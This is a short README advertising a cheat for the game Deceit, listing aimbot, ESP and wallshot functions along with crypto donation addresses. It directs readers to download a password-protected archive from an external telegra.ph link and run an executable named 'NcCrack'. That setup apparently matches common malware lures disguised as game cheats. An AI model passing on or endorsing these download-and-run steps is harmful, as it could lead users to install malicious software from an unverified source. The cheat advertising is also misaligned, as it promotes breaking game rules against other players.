# Deceit-Hack-AimBot-ESP-Misc

# IMPORTANT 

# Be sure to create an account on GitHub before launching the cheat 
# Without it, the cheat will not be able to contact the server


-----------------------------------------------------------------------------------------------------------------------
# Download Cheat
|[Download](https://telegra.ph/Download-04-16-418)|Password: 2077|
|---|---|
-----------------------------------------------------------------------------------------------------------------------

# Support the author ( On chips )

- BTC - bc1q7kmj3pyhcm2n02z6p7gxvusqv55pt7vcgxe6ut

- ETH - 0xE39c1E460cc0e10B1194F01832D19AA553b40633

- TRC-20 ( Usdt ) - TRYhDuV6qVcHQjfqEgF15w72TdxCMLDt9b

- BNB - 0xE39c1E460cc0e10B1194F01832D19AA553b40633

-----------------------------------------------------------------------------------------------------------------------

# How to install?

- Visit our website

- Download the archive 

- Unzip the archive to your desktop ( Password from the archive is 2077 )

- Run the file ( NcCrack )

- Launch the game

- In-game INSERT button

-----------------------------------------------------------------------------------------------------------------------

# SYSTEM REQUIREMENTS

- Processor | Intel | Amd Processor |

- Windows support | 7 | 8 | 8.1 | 10 | 11 |

- Build support | ALL |

-----------------------------------------------------------------------------------------------------------------------

# Functions

# VISUALS

- Players Enable / Enable the display of players
- Players Box / Display 2D squares around players
- Players Name / Display player names
- Players Distance / Display the distance to the players
- Players Health Bar / Display health on players
- Players Skeleton / Display skeletons on players
- Item Enable / Enable the display of items
- Blood Bag / Display a blood bag
- Health Kit / Display items for treatment
- Ammo / Display cartridges
- Armour / Display Armor
- Hallowen Event / Display items from a Halloween event
- Trap / Display traps
- Fuse / Display fuses
- Item Distance / Change the display distance to items

# AIMBOT

- Enable / Enable the aimbot
- FOV / Enable the radius of the aimbot
- FOV Value / Change the radius of the aimbot
- Auto Shot / Automatic Shooting
- Team / Select an aimbot goal
- Ditance / Change the range of the aimbot
- Key / Set the key for the aimbot to work
- Bone / Install a body part to operate the pSilent aimbot
- Silent aimbot
- Wallshot / Arrow Shot
